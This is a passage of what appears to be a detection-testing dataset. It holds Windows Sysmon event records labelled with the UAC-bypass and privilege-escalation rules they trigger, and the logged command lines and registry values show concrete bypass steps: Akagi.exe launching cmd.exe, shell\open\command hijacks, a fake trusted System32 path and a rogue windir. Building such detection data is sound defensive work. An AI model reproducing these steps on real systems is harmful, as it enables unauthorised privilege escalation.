UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\(Default)","UtcTime":"2019-08-04 
10:16:55.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5953,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:55.441262Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"{4ED3A719-CEA8-4BD9-910D-E252F997AFC2}","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-B097-5D46-0000-0010E7381204","ProcessId":3444,"RuleName":"PrivEsc - UAC bypass UACME-56","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\Shell\\open\\command\\DelegateExecute","UtcTime":"2019-08-04 10:16:55.619"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":5955,"Execution_attributes":{"ProcessID":2780,"ThreadID":3676},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-08-04T10:16:55.643799Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\Downloads\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 
(WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows \\System32\\winSAT.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-D21D-5D3C-0000-0020DD5C2300","LogonId":"0x235cdd","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39D-5D3C-0000-0010131E5600","ProcessId":7128,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:41.972"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4727,"Execution_attributes":{"ProcessID":2748,"ThreadID":3376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:42.033042Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows \\System32\\winSAT.exe\" formal","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows System Assessment Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=C6B8FDB2ED8FA8A20CD7348E221A18443EF8510B,MD5=BA2ED9D3420FC7F43CB0E535AE8A042C,SHA256=5BD1CD3B86A26DE22ED2C6CDD552C0DAD499B2F1BA1E5A85AF2FB78CFF5D502A,IMPHASH=6F82B876C4C1039B7980A9F0C8B57991","Image":"C:\\Windows 
\\System32\\winSAT.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D21D-5D3C-0000-0020EE5B2300","LogonId":"0x235bee","ParentCommandLine":"\"C:\\Users\\IEUser\\Downloads\\UACBypass.exe\" ","ParentImage":"C:\\Users\\IEUser\\Downloads\\UACBypass.exe","ParentProcessGuid":"747F3D96-D39D-5D3C-0000-001026F55500","ParentProcessId":6632,"ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"Microsoft® Windows® Operating System","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-27 22:43:42.354"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4730,"Execution_attributes":{"ProcessID":2748,"ThreadID":3376},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:42.392880Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["TrustedPath UAC Bypass Pattern"],"event":{"Event":{"EventData":{"Company":"?","Description":"?","FileVersion":"?","Hashes":"SHA1=7CE46211A5A8D7FE4A767E12BD80769673FDAEE5,MD5=7F8A2B842948EB70133FA34F0CFE772B,SHA256=078CA38607F24FD21A563FA5189843734677B98D5017D5EBB03B2960053B25B5,IMPHASH=14E2B78EE82AD03FAC47525FEDDCA7E6","Image":"C:\\Windows \\System32\\winSAT.exe","ImageLoaded":"C:\\Windows \\System32\\WINMM.dll","ProcessGuid":"747F3D96-D39E-5D3C-0000-0010805A5600","ProcessId":3904,"Product":"?","RuleName":"PrivEsc - UACBypass Mocking Trusted WinFolders","Signature":"","SignatureStatus":"Unavailable","Signed":"false","UtcTime":"2019-07-27 
22:43:42.661"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4732,"Execution_attributes":{"ProcessID":2748,"ThreadID":3384},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-27T22:43:43.016956Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"c:\\Windows\\System32\\cmd.exe","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-095D-5EB4-0000-001082FF1700","ProcessId":7084,"RuleName":"PrivEsc - T1088 - UACBypass - changepk UACME61","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000_Classes\\Launcher.SystemSettings\\shell\\open\\command\\(Default)","UtcTime":"2020-05-07 13:13:01.680"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":112814,"Execution_attributes":{"ProcessID":2888,"ThreadID":3384},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-05-07T13:13:01.683498Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 09:50:08.491","Image":"c:\\python27\\python.exe","ProcessGuid":"365ABB72-9AD0-5CD6-0000-001077FC1600","ProcessId":1136,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\CRYPTBASE.dll","UtcTime":"2019-05-11 09:50:08.491"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15875,"Execution_attributes":{"ProcessID":2000,"ThreadID":1748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T09:50:08.491568Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2019-05-11 09:50:13.464","Image":"C:\\Windows\\System32\\makecab.exe","ProcessGuid":"365ABB72-9AD5-5CD6-0000-0010C4131700","ProcessId":3716,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\suspicious.cab","UtcTime":"2019-05-11 
09:50:13.464"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":15877,"Execution_attributes":{"ProcessID":2000,"ThreadID":1748},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2019-05-11T09:50:13.509892Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-BDD1-5EC9-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"c:\\Windows\\System32\\cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-CA4E-5EC9-0000-00109FE23700","ParentProcessId":1516,"ProcessGuid":"747F3D96-CA52-5EC9-0000-001027FA3700","ProcessId":4456,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-24 
01:13:54.117"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":196375,"Execution_attributes":{"ProcessID":2812,"ThreadID":3656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-24T01:13:54.120170Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Taskmgr as Parent"],"event":{"Event":{"EventData":{"CommandLine":"cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Windows Command Processor","FileVersion":"10.0.18362.449 (WinBuild.160101.0800)","Hashes":"SHA1=8DCA9749CD48D286950E7A9FA1088C937CBCCAD4,MD5=D7AB69FAD18D4A643D84A271DFC0DBDF,SHA256=FF79D3C4A0B7EB191783C323AB8363EBD1FD10BE58D8BCC96B07067743CA81D5,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8C36-5F75-0000-002034E39103","LogonId":"0x391e334","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\windows\\system32\\taskmgr.exe","ParentImage":"C:\\Windows\\System32\\Taskmgr.exe","ParentProcessGuid":"00247C92-858E-5F7B-0000-00105241202B","ParentProcessId":18404,"ProcessGuid":"00247C92-858E-5F7B-0000-0010E741202B","ProcessId":6636,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":2,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-10-05 
20:43:58.450"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2164892,"Execution_attributes":{"ProcessID":5424,"ThreadID":6708},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-05T20:43:58.451314Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"POC.exe","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1EB6-5F76-0000-00101DF51D00","ParentProcessId":8072,"ProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ProcessId":4696,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 
18:35:02.413"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410485,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.415351Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"Program","Company":"","CurrentDirectory":"C:\\Users\\Public\\POC\\bin\\Debug\\","Description":"SearchIndexer","FileVersion":"1.0.0.0","Hashes":"SHA1=3DA62D5328C591481C9C262BC3A77E5FF32EDBB6,MD5=15661E68D8031891DF6E0E70B547AEBB,SHA256=BEF67963D92D027E39CC5FC927805A4EBFE58C2121BA9396356EF0CE257D0C92,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","IntegrityLevel":"AppContainer","LogonGuid":"747F3D96-18F5-5F76-0000-002073A80500","LogonId":"0x5a873","OriginalFileName":"POC.exe","ParentCommandLine":"POC.exe","ParentImage":"C:\\Users\\Public\\POC\\bin\\Debug\\POC.exe","ParentProcessGuid":"747F3D96-2156-5F76-0000-0010DBE82500","ParentProcessId":4696,"ProcessGuid":"747F3D96-2156-5F76-0000-00100EEC2500","ProcessId":5448,"Product":"SearchIndexer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-01 
18:35:02.605"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":410486,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.606952Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-10-01 18:35:02.768","Image":"C:\\Windows\\System32\\RuntimeBroker.exe","ProcessGuid":"747F3D96-1903-5F76-0000-0010B85E0900","ProcessId":6932,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\abc.txt","UtcTime":"2020-10-01 18:35:02.768"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":410487,"Execution_attributes":{"ProcessID":3308,"ThreadID":4656},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-10-01T18:35:02.775302Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s gpsvc","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host 
Process for Windows Services","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-5461-5EBA-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"svchost.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":580,"ProcessGuid":"747F3D96-DE32-5EB9-0000-00103FC14300","ProcessId":5252,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-05-11 23:22:26.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":142033,"Execution_attributes":{"ProcessID":2896,"ThreadID":3548},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-11T23:22:26.650196Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Users\\Public\\psexecprivesc.exe\" 
C:\\Windows\\System32\\mspaint.exe","Company":"?","CurrentDirectory":"C:\\Users\\Public\\","Description":"?","FileVersion":"?","Hashes":"SHA1=D7BADB1E51B7F5AB36D218854698215436C77D69,MD5=45C9D210322AC8F8AEC6D2AB003F82A9,SHA256=F60E25BFB2BF7CB3E3CBD47F6A6D12941BD0BC0CF5B5626415607FDF0ACD2132,IMPHASH=6BC87C5562804B37769BD928D309AFDA","Image":"C:\\Users\\Public\\psexecprivesc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-FBCC-5FD0-0000-0020CB857400","LogonId":"0x7485cb","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" ","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-FBFF-5FD0-0000-0010BEC87C00","ParentProcessId":14512,"ProcessGuid":"747F3D96-00D2-5FD1-0000-0010FA4C5301","ProcessId":13004,"Product":"?","RuleName":"","TerminalSessionId":3,"User":"MSEDGEWIN10\\user02","UtcTime":"2020-12-09 16:52:34.559"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549480,"Execution_attributes":{"ProcessID":3572,"ThreadID":5040},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-09T16:52:34.562791Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["PsExec Service Start"],"event":{"Event":{"EventData":{"CommandLine":"C:\\Windows\\PSEXESVC.exe","Company":"Sysinternals","CurrentDirectory":"C:\\Windows\\system32\\","Description":"PsExec 
Service","FileVersion":"2.2","Hashes":"SHA1=A17C21B909C56D93D978014E63FB06926EAEA8E7,MD5=75B55BB34DAC9D02740B9AD6B6820360,SHA256=141B2190F51397DBD0DFDE0E3904B264C91B6F81FEBC823FF0C33DA980B69944,IMPHASH=67012475995FB9027F4511245B57DDEA","Image":"C:\\Windows\\PSEXESVC.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-76FA-5FD1-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"psexesvc.exe","ParentCommandLine":"?","ParentImage":"?","ParentProcessGuid":"00000000-0000-0000-0000-000000000000","ParentProcessId":632,"ProcessGuid":"747F3D96-00D9-5FD1-0000-001021855301","ProcessId":16344,"Product":"Sysinternals PsExec","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-12-09 16:52:41.853"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":549482,"Execution_attributes":{"ProcessID":3572,"ThreadID":5040},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-12-09T16:52:41.861437Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Tool UACMe"],"event":{"Event":{"EventData":{"CommandLine":"Akagi.exe 58 c:\\Windows\\System32\\cmd.exe","Company":"Hazardous Environments","CurrentDirectory":"C:\\Users\\IEUser\\Tools\\PrivEsc\\","Description":"UACMe main 
module","FileVersion":"3.2.5.2005","Hashes":"SHA1=874C9878FF9C1A9AC60658E83649370EA4E61829,MD5=FD17237A6B50C51CBEB45A28E0284063,SHA256=B4E9DCFC87014B2B70CC9E3CD4E34AE4425E40C81A2ED008C7D335E3F96ADD19,IMPHASH=FF31A97D8C8EBEBDA4D7B3DF95E756F1","Image":"C:\\Users\\IEUser\\Tools\\PrivEsc\\Akagi.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-B086-5EBA-0000-0020EF9E0800","LogonId":"0x89eef","OriginalFileName":"Akagi.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-B093-5EBA-0000-0010E7350E00","ParentProcessId":6708,"ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"Product":"UACMe","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-05-12 15:06:49.006"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":143173,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.019031Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK","EventType":"SetValue","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"PrivEsc - Rogue Windir - UAC bypass prep","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\windir","UtcTime":"2020-05-12 
15:06:49.118"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":143174,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.183867Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"EventData":{"CreationUtcTime":"2020-05-12 15:06:49.134","Image":"C:\\Windows\\explorer.exe","ProcessGuid":"747F3D96-BB89-5EBA-0000-001057413600","ProcessId":1036,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Local\\Temp\\DNeruK\\system32\\Clipup.exe","UtcTime":"2020-05-12 15:06:49.134"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":143175,"Execution_attributes":{"ProcessID":2856,"ThreadID":3608},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":11,"TimeCreated_attributes":{"SystemTime":"2020-05-12T15:06:49.184059Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","Suspicious PROCEXP152.sys File Created In TMP","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - 
